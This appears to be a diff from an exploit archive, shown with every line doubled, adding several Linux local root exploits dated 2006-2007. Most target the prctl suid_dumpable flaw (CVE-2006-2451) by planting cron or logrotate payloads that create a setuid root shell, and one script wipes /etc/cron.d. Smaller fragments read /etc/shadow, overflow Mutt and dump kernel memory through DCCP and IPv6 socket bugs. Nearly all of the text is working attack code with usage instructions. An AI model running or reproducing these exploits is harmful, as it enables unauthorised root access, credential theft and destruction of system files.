* user setable argument to PR_SET_DUMPABLE. * user setable argument to PR_SET_DUMPABLE.
* *
* This flaw allows us to create a root owned coredump into any directory. * This flaw allows us to create a root owned coredump into any directory.
* This is trivially exploitable. * This is trivially exploitable.
* *
*/ */
#include <sys/types.h> #include <sys/types.h>
#include <sys/time.h> #include <sys/time.h>
#include <sys/resource.h> #include <sys/resource.h>
#include <sys/prctl.h> #include <sys/prctl.h>
#include <unistd.h> #include <unistd.h>
#include <stdio.h> #include <stdio.h>
#include <errno.h> #include <errno.h>
#include <signal.h> #include <signal.h>
#include <stdlib.h> #include <stdlib.h>
#include <time.h> #include <time.h>
#define CROND "/etc/cron.d" #define CROND "/etc/cron.d"
#define BUFSIZE 2048 #define BUFSIZE 2048
struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY}; struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};
char crontemplate[]= char crontemplate[]=
"#/etc/cron.d/core suid_dumpable exploit\n" "#/etc/cron.d/core suid_dumpable exploit\n"
"SHELL=/bin/sh\n" "SHELL=/bin/sh\n"
"PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n" "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
"#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n"; "#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";
char cronstring[BUFSIZE]; char cronstring[BUFSIZE];
char fname[BUFSIZE]; char fname[BUFSIZE];
struct timeval te; struct timeval te;
void sh(int sn) { void sh(int sn) {
execl(fname, fname, (char *) NULL); execl(fname, fname, (char *) NULL);
} }
int main(int argc, char *argv[]) { int main(int argc, char *argv[]) {
int nw, pid; int nw, pid;
if (geteuid() == 0) { if (geteuid() == 0) {
printf("[+] getting root shell\n"); printf("[+] getting root shell\n");
setuid(0); setuid(0);
setgid(0); setgid(0);
if (execl("/bin/sh", "/bin/sh", (char *) NULL)) { if (execl("/bin/sh", "/bin/sh", (char *) NULL)) {
perror("[-] execle"); perror("[-] execle");
return 1; return 1;
} }
} }
printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n"); printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n");
/* get our file name */ /* get our file name */
if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) { if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) {
perror("[-] readlink"); perror("[-] readlink");
printf("This is not fatal, rewrite the exploit\n"); printf("This is not fatal, rewrite the exploit\n");
} }
if (signal(SIGUSR1, sh) == SIG_ERR) { if (signal(SIGUSR1, sh) == SIG_ERR) {
perror("[-] signal"); perror("[-] signal");
return 1; return 1;
} }
printf("[+] Installed signal handler\n"); printf("[+] Installed signal handler\n");
/* Let us create core files */ /* Let us create core files */
setrlimit(RLIMIT_CORE, &myrlimit); setrlimit(RLIMIT_CORE, &myrlimit);
if (chdir(CROND) == -1) { if (chdir(CROND) == -1) {
perror("[-] chdir"); perror("[-] chdir");
return 1; return 1;
} }
/* exploit the flaw */ /* exploit the flaw */
if (prctl(PR_SET_DUMPABLE, 2) == -1) { if (prctl(PR_SET_DUMPABLE, 2) == -1) {
perror("[-] prtctl"); perror("[-] prtctl");
printf("Is you kernel version >= 2.6.13 ?\n"); printf("Is you kernel version >= 2.6.13 ?\n");
return 1; return 1;
} }
printf("[+] We are suidsafe dumpable!\n"); printf("[+] We are suidsafe dumpable!\n");
/* Forge the string for our core dump */ /* Forge the string for our core dump */
nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid()); nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid());
if (nw >= sizeof(cronstring)) { if (nw >= sizeof(cronstring)) {
printf("[-] cronstring is too small\n"); printf("[-] cronstring is too small\n");
return 1; return 1;
} }
printf("[+] Malicious string forged\n"); printf("[+] Malicious string forged\n");
if ((pid=fork()) == -1) { if ((pid=fork()) == -1) {
perror("[-] fork"); perror("[-] fork");
return 1; return 1;
} }
if (pid == 0) { if (pid == 0) {
/* This is not the good way to do it ;) */ /* This is not the good way to do it ;) */
sleep(120); sleep(120);
exit(0); exit(0);
} }
/* SEGFAULT the child */ /* SEGFAULT the child */
printf("[+] Segfaulting child\n"); printf("[+] Segfaulting child\n");
if (kill(pid, 11) == -1) { if (kill(pid, 11) == -1) {
perror("[-] kill"); perror("[-] kill");
return 1; return 1;
} }
if (gettimeofday(&te, NULL) == 0) if (gettimeofday(&te, NULL) == 0)
printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60)); printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60));
sleep(120); sleep(120);
printf("[-] It looks like the exploit failed\n"); printf("[-] It looks like the exploit failed\n");
return 1; return 1;
} }
// milw0rm.com [2006-07-12] // milw0rm.com [2006-07-12]

222
platforms/linux/local/2006.c
View file

@ -1,111 +1,111 @@
/* /*
* $Id: raptor_prctl.c,v 1.1 2006/07/13 14:21:43 raptor Exp $ * $Id: raptor_prctl.c,v 1.1 2006/07/13 14:21:43 raptor Exp $
* *
* raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability * raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability
* Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info> * Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
* *
* The suid_dumpable support in Linux kernel 2.6.13 up to versions before * The suid_dumpable support in Linux kernel 2.6.13 up to versions before
* 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial
* of service (disk consumption) and POSSIBILY (yeah, sure;) gain privileges * of service (disk consumption) and POSSIBILY (yeah, sure;) gain privileges
* via the PR_SET_DUMPABLE argument of the prctl function and a program that * via the PR_SET_DUMPABLE argument of the prctl function and a program that
* causes a core dump file to be created in a directory for which the user does * causes a core dump file to be created in a directory for which the user does
* not have permissions (CVE-2006-2451). * not have permissions (CVE-2006-2451).
* *
* Berlin, Sunday July 9th 2006: CAMPIONI DEL MONDO! CAMPIONI DEL MONDO! * Berlin, Sunday July 9th 2006: CAMPIONI DEL MONDO! CAMPIONI DEL MONDO!
* CAMPIONI DEL MONDO! (i was tempted to name this exploit "pajolo.c";)) * CAMPIONI DEL MONDO! (i was tempted to name this exploit "pajolo.c";))
* *
* Greets to Paul Starzetz and Roman Medina, who also exploited this ugly bug. * Greets to Paul Starzetz and Roman Medina, who also exploited this ugly bug.
* *
* NOTE. This exploit uses the Vixie's crontab /etc/cron.d attack vector: this * NOTE. This exploit uses the Vixie's crontab /etc/cron.d attack vector: this
* means that distributions that use a different configuration (namely Dillon's * means that distributions that use a different configuration (namely Dillon's
* crontab on Slackware Linux) can be vulnerable but not directly exploitable. * crontab on Slackware Linux) can be vulnerable but not directly exploitable.
* *
* Usage: * Usage:
* $ gcc raptor_prctl.c -o raptor_prctl -Wall * $ gcc raptor_prctl.c -o raptor_prctl -Wall
* [exploit must be dinamically linked] * [exploit must be dinamically linked]
* $ ./raptor_prctl * $ ./raptor_prctl
* [...] * [...]
* sh-3.00# * sh-3.00#
* *
* Vulnerable platforms: * Vulnerable platforms:
* Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default] * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default]
*/ */
#include <stdio.h> #include <stdio.h>
#include <unistd.h> #include <unistd.h>
#include <stdlib.h> #include <stdlib.h>
#include <signal.h> #include <signal.h>
#include <sys/stat.h> #include <sys/stat.h>
#include <sys/resource.h> #include <sys/resource.h>
#include <sys/prctl.h> #include <sys/prctl.h>
#define INFO1 "raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability" #define INFO1 "raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability"
#define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>" #define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
char payload[] = /* commands to be executed by privileged crond */ char payload[] = /* commands to be executed by privileged crond */
"\nSHELL=/bin/sh\nPATH=/usr/bin:/usr/sbin:/sbin:/bin\n* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core\n"; "\nSHELL=/bin/sh\nPATH=/usr/bin:/usr/sbin:/sbin:/bin\n* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core\n";
char pwnage[] = /* build setuid() helper to circumvent bash checks */ char pwnage[] = /* build setuid() helper to circumvent bash checks */
"echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c"; "echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c";
int main(void) int main(void)
{ {
int pid, i; int pid, i;
struct rlimit corelimit; struct rlimit corelimit;
struct stat st; struct stat st;
/* print exploit information */ /* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* prepare the setuid() helper */ /* prepare the setuid() helper */
system(pwnage); system(pwnage);
/* set core size to unlimited */ /* set core size to unlimited */
corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit); setrlimit(RLIMIT_CORE, &corelimit);
/* let's do the PR_SET_DUMPABLE magic */ /* let's do the PR_SET_DUMPABLE magic */
if (!(pid = fork())) { if (!(pid = fork())) {
chdir("/etc/cron.d"); chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2); prctl(PR_SET_DUMPABLE, 2);
sleep(666); sleep(666);
exit(1); exit(1);
} }
kill(pid, SIGSEGV); kill(pid, SIGSEGV);
/* did it work? */ /* did it work? */
sleep(3); sleep(3);
if (stat("/etc/cron.d/core", &st) < 0) { if (stat("/etc/cron.d/core", &st) < 0) {
fprintf(stderr, "Error: Not vulnerable? See comments.\n"); fprintf(stderr, "Error: Not vulnerable? See comments.\n");
exit(1); exit(1);
} }
fprintf(stderr, "Ready to uncork the champagne? "); fprintf(stderr, "Ready to uncork the champagne? ");
fprintf(stderr, "Please wait a couple of minutes;)\n"); fprintf(stderr, "Please wait a couple of minutes;)\n");
/* wait for crond to execute our evil entry */ /* wait for crond to execute our evil entry */
for (i = 0; i < 124; i += 2) { for (i = 0; i < 124; i += 2) {
if (stat("/tmp/pwned", &st) < 0) { if (stat("/tmp/pwned", &st) < 0) {
fprintf(stderr, "\nError: Check /tmp/pwned!\n"); fprintf(stderr, "\nError: Check /tmp/pwned!\n");
exit(1); exit(1);
} }
if (st.st_uid == 0) if (st.st_uid == 0)
break; break;
fprintf(stderr, "."); fprintf(stderr, ".");
sleep(2); sleep(2);
} }
/* timeout reached? */ /* timeout reached? */
if (i > 120) { if (i > 120) {
fprintf(stderr, "\nTimeout: Check /tmp/pwned!\n"); fprintf(stderr, "\nTimeout: Check /tmp/pwned!\n");
exit(1); exit(1);
} }
/* total pwnage */ /* total pwnage */
fprintf(stderr, "CAMPIONI DEL MONDO!\n\n"); fprintf(stderr, "CAMPIONI DEL MONDO!\n\n");
system("/tmp/pwned"); system("/tmp/pwned");
exit(0); exit(0);
} }
// milw0rm.com [2006-07-13] // milw0rm.com [2006-07-13]

128
platforms/linux/local/2011.sh
View file

@ -1,64 +1,64 @@
#!/bin/sh #!/bin/sh
# #
# PRCTL local root exp By: Sunix # PRCTL local root exp By: Sunix
# + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp # + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp
# tested on Intel(R) Xeon(TM) CPU 3.20GHz # tested on Intel(R) Xeon(TM) CPU 3.20GHz
# kernel 2.6.9-22.ELsmp # kernel 2.6.9-22.ELsmp
# maybe others ... # maybe others ...
# Tx to drayer & RoMaNSoFt for their clear code... # Tx to drayer & RoMaNSoFt for their clear code...
# #
# zmia23@yahoo.com # zmia23@yahoo.com
cat > /tmp/getsuid.c << __EOF__ cat > /tmp/getsuid.c << __EOF__
#include <stdio.h> #include <stdio.h>
#include <sys/time.h> #include <sys/time.h>
#include <sys/resource.h> #include <sys/resource.h>
#include <unistd.h> #include <unistd.h>
#include <linux/prctl.h> #include <linux/prctl.h>
#include <stdlib.h> #include <stdlib.h>
#include <sys/types.h> #include <sys/types.h>
#include <signal.h> #include <signal.h>
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";
int main() { int main() {
int child; int child;
struct rlimit corelimit; struct rlimit corelimit;
corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit); setrlimit(RLIMIT_CORE, &corelimit);
if ( !( child = fork() )) { if ( !( child = fork() )) {
chdir("/etc/cron.d"); chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2); prctl(PR_SET_DUMPABLE, 2);
sleep(200); sleep(200);
exit(1); exit(1);
} }
kill(child, SIGSEGV); kill(child, SIGSEGV);
sleep(120); sleep(120);
} }
__EOF__ __EOF__
cat > /tmp/s.c << __EOF__ cat > /tmp/s.c << __EOF__
#include<stdio.h> #include<stdio.h>
main(void) main(void)
{ {
setgid(0); setgid(0);
setuid(0); setuid(0);
system("/bin/sh"); system("/bin/sh");
system("rm -rf /tmp/s"); system("rm -rf /tmp/s");
system("rm -rf /etc/cron.d/*"); system("rm -rf /etc/cron.d/*");
return 0; return 0;
} }
__EOF__ __EOF__
echo "wait aprox 4 min to get sh" echo "wait aprox 4 min to get sh"
cd /tmp cd /tmp
cc -o s s.c cc -o s s.c
cc -o getsuid getsuid.c cc -o getsuid getsuid.c
./getsuid ./getsuid
./s ./s
rm -rf getsuid* rm -rf getsuid*
rm -rf s.c rm -rf s.c
rm -rf prctl.sh rm -rf prctl.sh
# milw0rm.com [2006-07-14] # milw0rm.com [2006-07-14]

216
platforms/linux/local/2031.c
View file

@ -1,108 +1,108 @@
/* /*
* $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $ * $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $
* *
* raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate) * raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)
* Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info> * Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
* *
* The suid_dumpable support in Linux kernel 2.6.13 up to versions before * The suid_dumpable support in Linux kernel 2.6.13 up to versions before
* 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial
* of service (disk consumption) and POSSIBLY (yeah, sure;) gain privileges via * of service (disk consumption) and POSSIBLY (yeah, sure;) gain privileges via
* the PR_SET_DUMPABLE argument of the prctl function and a program that causes * the PR_SET_DUMPABLE argument of the prctl function and a program that causes
* a core dump file to be created in a directory for which the user does not * a core dump file to be created in a directory for which the user does not
* have permissions (CVE-2006-2451). * have permissions (CVE-2006-2451).
* *
* This exploit uses the logrotate attack vector: of course, you must be able * This exploit uses the logrotate attack vector: of course, you must be able
* to chdir() into the /etc/logrotate.d directory in order to exploit the * to chdir() into the /etc/logrotate.d directory in order to exploit the
* vulnerability. I've experimented a bit with other attack vectors as well, * vulnerability. I've experimented a bit with other attack vectors as well,
* with no luck: at (/var/spool/atjobs/) uses file name information to * with no luck: at (/var/spool/atjobs/) uses file name information to
* establish execution time, /etc/cron.hourly|daily|weekly|monthly want +x * establish execution time, /etc/cron.hourly|daily|weekly|monthly want +x
* permissions, xinetd (/etc/xinetd.d) puked out the crafted garbage-filled * permissions, xinetd (/etc/xinetd.d) puked out the crafted garbage-filled
* coredump (see also http://www.0xdeadbeef.info/exploits/raptor_prctl.c). * coredump (see also http://www.0xdeadbeef.info/exploits/raptor_prctl.c).
* *
* Thanks to Solar Designer for the interesting discussion on attack vectors. * Thanks to Solar Designer for the interesting discussion on attack vectors.
* *
* NOTE THAT IN ORDER TO WORK THIS EXPLOIT *MUST* BE STATICALLY LINKED!!! * NOTE THAT IN ORDER TO WORK THIS EXPLOIT *MUST* BE STATICALLY LINKED!!!
* *
* Usage: * Usage:
* $ gcc raptor_prctl2.c -o raptor_prctl2 -static -Wall * $ gcc raptor_prctl2.c -o raptor_prctl2 -static -Wall
* [exploit must be statically linked] * [exploit must be statically linked]
* $ ./raptor_prctl2 * $ ./raptor_prctl2
* [please wait until logrotate is run] * [please wait until logrotate is run]
* $ ls -l /tmp/pwned * $ ls -l /tmp/pwned
* -rwsr-xr-x 1 root users 7221 2006-07-18 13:32 /tmp/pwned * -rwsr-xr-x 1 root users 7221 2006-07-18 13:32 /tmp/pwned
* $ /tmp/pwned * $ /tmp/pwned
* sh-3.00# id * sh-3.00# id
* uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users) * uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users)
* sh-3.00# * sh-3.00#
* [don't forget to delete /tmp/pwned!] * [don't forget to delete /tmp/pwned!]
* *
* Vulnerable platforms: * Vulnerable platforms:
* Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default] * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default]
*/ */
#include <stdio.h> #include <stdio.h>
#include <unistd.h> #include <unistd.h>
#include <stdlib.h> #include <stdlib.h>
#include <signal.h> #include <signal.h>
#include <sys/stat.h> #include <sys/stat.h>
#include <sys/resource.h> #include <sys/resource.h>
#include <sys/prctl.h> #include <sys/prctl.h>
#define INFO1 "raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)" #define INFO1 "raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)"
#define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>" #define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
char payload[] = /* commands to be executed by privileged logrotate */ char payload[] = /* commands to be executed by privileged logrotate */
"\n/var/log/core {\n daily\n size=0\n firstaction\n chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/logrotate.d/core; rm -f /var/log/core*\n endscript\n}\n"; "\n/var/log/core {\n daily\n size=0\n firstaction\n chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/logrotate.d/core; rm -f /var/log/core*\n endscript\n}\n";
char pwnage[] = /* build setuid() helper to circumvent bash checks */ char pwnage[] = /* build setuid() helper to circumvent bash checks */
"echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c"; "echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c";
int main(void) int main(void)
{ {
int pid; int pid;
struct rlimit corelimit; struct rlimit corelimit;
struct stat st; struct stat st;
/* print exploit information */ /* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* prepare the setuid() helper */ /* prepare the setuid() helper */
system(pwnage); system(pwnage);
/* set core size to unlimited */ /* set core size to unlimited */
corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit); setrlimit(RLIMIT_CORE, &corelimit);
/* let's create a fake logfile in /var/log */ /* let's create a fake logfile in /var/log */
if (!(pid = fork())) { if (!(pid = fork())) {
chdir("/var/log"); chdir("/var/log");
prctl(PR_SET_DUMPABLE, 2); prctl(PR_SET_DUMPABLE, 2);
sleep(666); sleep(666);
exit(1); exit(1);
} }
kill(pid, SIGSEGV); kill(pid, SIGSEGV);
/* let's do the PR_SET_DUMPABLE magic */ /* let's do the PR_SET_DUMPABLE magic */
if (!(pid = fork())) { if (!(pid = fork())) {
chdir("/etc/logrotate.d"); chdir("/etc/logrotate.d");
prctl(PR_SET_DUMPABLE, 2); prctl(PR_SET_DUMPABLE, 2);
sleep(666); sleep(666);
exit(1); exit(1);
} }
kill(pid, SIGSEGV); kill(pid, SIGSEGV);
/* did it work? */ /* did it work? */
sleep(3); sleep(3);
if ((stat("/var/log/core", &st) < 0) || if ((stat("/var/log/core", &st) < 0) ||
(stat("/etc/logrotate.d/core", &st) < 0)) { (stat("/etc/logrotate.d/core", &st) < 0)) {
fprintf(stderr, "Error: Not vulnerable? See comments.\n"); fprintf(stderr, "Error: Not vulnerable? See comments.\n");
exit(1); exit(1);
} }
/* total pwnage */ /* total pwnage */
fprintf(stderr, "Please wait until logrotate is run and check /tmp/pwned;)\n"); fprintf(stderr, "Please wait until logrotate is run and check /tmp/pwned;)\n");
exit(0); exit(0);
} }
// milw0rm.com [2006-07-18] // milw0rm.com [2006-07-18]

6
platforms/linux/local/216.c
View file

@ -143,6 +143,6 @@ int main( int argc, char * argv[] )
execve( execve_argv[0], execve_argv, NULL ); execve( execve_argv[0], execve_argv, NULL );
return( -1 ); return( -1 );
} }
// milw0rm.com [2000-12-02] // milw0rm.com [2000-12-02]

6
platforms/linux/local/252.pl
View file

@ -64,6 +64,6 @@ $buffer .= $shellcode;
# then: export DISPLAY=your-ip:0.0 - and execute the exploit. # then: export DISPLAY=your-ip:0.0 - and execute the exploit.
exec("/usr/X11R6/bin/seyon -noemulator \"$buffer\""); exec("/usr/X11R6/bin/seyon -noemulator \"$buffer\"");
# milw0rm.com [2001-01-15] # milw0rm.com [2001-01-15]

6
platforms/linux/local/258.sh
View file

@ -27,6 +27,6 @@ echo "[*] krochos@linuxmail.org"
sleep 1 sleep 1
echo "[*] export RESOLV_HOST_CONF=/etc/shadow" echo "[*] export RESOLV_HOST_CONF=/etc/shadow"
ssh lt 2>/tmp/.resolv ssh lt 2>/tmp/.resolv
cat /tmp/.resolv | cut -d"\`" -f5,2 | awk -F"\'" '{print $1} ' cat /tmp/.resolv | cut -d"\`" -f5,2 | awk -F"\'" '{print $1} '
# milw0rm.com [2001-01-25] # milw0rm.com [2001-01-25]

11
platforms/linux/local/30093.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24192/info
Mutt is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before using it in a memory copy operation.
An attacker can exploit this issue to execute arbitrary code with the with the privileges of the victim. Failed exploit attempts will result in a denial of service.
# USERNAME=$(perl -e 'print "a" x 31')
# useradd -c '&&&&&&&&& your-favourite-ascii-shellcode-here' $USERNAME
# echo alias billg $USERNAME >~/.muttrc
# mutt billg
# Segmentation fault (core dumped)

78
platforms/linux/local/3595.c
View file

@ -1,39 +1,39 @@
#include <netinet/in.h> #include <netinet/in.h>
#include <stdio.h> #include <stdio.h>
#include <sys/types.h> #include <sys/types.h>
#include <sys/socket.h> #include <sys/socket.h>
#include <net/if.h> #include <net/if.h>
#include <sys/mman.h> #include <sys/mman.h>
#include <linux/net.h> #include <linux/net.h>
#define BUFSIZE 0x10000000 #define BUFSIZE 0x10000000
int main(int argc, char *argv[]) int main(int argc, char *argv[])
{ {
void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE, void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (mem == (void*)-1) { if (mem == (void*)-1) {
printf("Alloc failed\n"); printf("Alloc failed\n");
return -1; return -1;
} }
/* SOCK_DCCP, IPPROTO_DCCP */ /* SOCK_DCCP, IPPROTO_DCCP */
int s = socket(PF_INET, 6, 33); int s = socket(PF_INET, 6, 33);
if (s == -1) { if (s == -1) {
fprintf(stderr, "socket failure!\n"); fprintf(stderr, "socket failure!\n");
return 1; return 1;
} }
/* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */ /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */
int len = BUFSIZE; int len = BUFSIZE;
int x = getsockopt(s, 269, 11, mem, &len); int x = getsockopt(s, 269, 11, mem, &len);
if (x == -1) if (x == -1)
perror("SETSOCKOPT"); perror("SETSOCKOPT");
else else
printf("SUCCESS\n"); printf("SUCCESS\n");
write(1, mem, BUFSIZE); write(1, mem, BUFSIZE);
return 0; return 0;
} }
// milw0rm.com [2007-03-28] // milw0rm.com [2007-03-28]

168
platforms/linux/local/4172.c
View file

@ -1,84 +1,84 @@
/* /*
* Linux Kernel IPV6_Getsockopt_Sticky Memory Leak Proof Of Concept * Linux Kernel IPV6_Getsockopt_Sticky Memory Leak Proof Of Concept
* dreyer 07-2007 * dreyer 07-2007
* Osu, Tatakae, Sexy Pandas! * Osu, Tatakae, Sexy Pandas!
* *
* Dumps to stdout the memory mapped between INI and END. * Dumps to stdout the memory mapped between INI and END.
* *
* CVE: CVE-2007-1000 BID: 22904 * CVE: CVE-2007-1000 BID: 22904
* *
* Affected: Linux Kernel < 2.6.20.2 * Affected: Linux Kernel < 2.6.20.2
* *
* http://bugzilla.kernel.org/show_bug.cgi?id=8134 * http://bugzilla.kernel.org/show_bug.cgi?id=8134
* *
* Exploitation based on null pointer dereference: http://lists.immunitysec.com/pipermail/dailydave/2007-March/004133.html * Exploitation based on null pointer dereference: http://lists.immunitysec.com/pipermail/dailydave/2007-March/004133.html
* *
* For free!!! ( worth 600 EUR in zerobay! ) * For free!!! ( worth 600 EUR in zerobay! )
* *
*/ */
#include <sys/mman.h> #include <sys/mman.h>
#include <netinet/in.h> #include <netinet/in.h>
#include <string.h> #include <string.h>
#include <stdlib.h> #include <stdlib.h>
#include <stdio.h> #include <stdio.h>
#define HOPOPT_OFFSET 8 #define HOPOPT_OFFSET 8
#define INIADDR 0xc0100000 #define INIADDR 0xc0100000
#define ENDADDR 0xd0000000 #define ENDADDR 0xd0000000
unsigned int i; unsigned int i;
int main(int argc, char *argv[]) { int main(int argc, char *argv[]) {
int s; int s;
unsigned int optlen; unsigned int optlen;
void *ptr; void *ptr;
char value[10240]; char value[10240];
char text[12]; char text[12];
fprintf(stderr,"Ipv6_getsockopt_sticky vuln POC\n" fprintf(stderr,"Ipv6_getsockopt_sticky vuln POC\n"
"dreyer '07 - free feels better\n" "dreyer '07 - free feels better\n"
"Dumping %p - %p to stdout\n",INIADDR,ENDADDR); "Dumping %p - %p to stdout\n",INIADDR,ENDADDR);
s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP); s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
/* Make np->opt = NULL = 0x00000000 through IPV6_2292PKTOPTIONS */ /* Make np->opt = NULL = 0x00000000 through IPV6_2292PKTOPTIONS */
setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, (void *)NULL, 0); setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, (void *)NULL, 0);
/* Make 0x00000000 address valid */ /* Make 0x00000000 address valid */
ptr = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); ptr = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (ptr != NULL) { if (ptr != NULL) {
perror("mmap"); perror("mmap");
exit(-1); exit(-1);
} }
memset(ptr,0,4096); memset(ptr,0,4096);
/* Make ptr point to np->opt->hopopt = (0x00000000)->hopopt = /* Make ptr point to np->opt->hopopt = (0x00000000)->hopopt =
* 0x00000000 + 8 */ * 0x00000000 + 8 */
ptr=(char *)((char *)ptr+HOPOPT_OFFSET); ptr=(char *)((char *)ptr+HOPOPT_OFFSET);
i=INIADDR; i=INIADDR;
while(i<ENDADDR) { while(i<ENDADDR) {
/* Put in hopopt the address we want to read */ /* Put in hopopt the address we want to read */
*((int *)ptr)=i; *((int *)ptr)=i;
optlen=10240; optlen=10240;
/* Get the chunk pointed by hopopt through getsockopt IPV6_DSTOPTS */ /* Get the chunk pointed by hopopt through getsockopt IPV6_DSTOPTS */
getsockopt(s, IPPROTO_IPV6, IPV6_DSTOPTS, (void *)value, &optlen); getsockopt(s, IPPROTO_IPV6, IPV6_DSTOPTS, (void *)value, &optlen);
if(optlen>0) { if(optlen>0) {
sprintf(text,"\n%08x:",i); sprintf(text,"\n%08x:",i);
write(1,text,strlen(text)); write(1,text,strlen(text));
write(1,value,optlen); write(1,value,optlen);
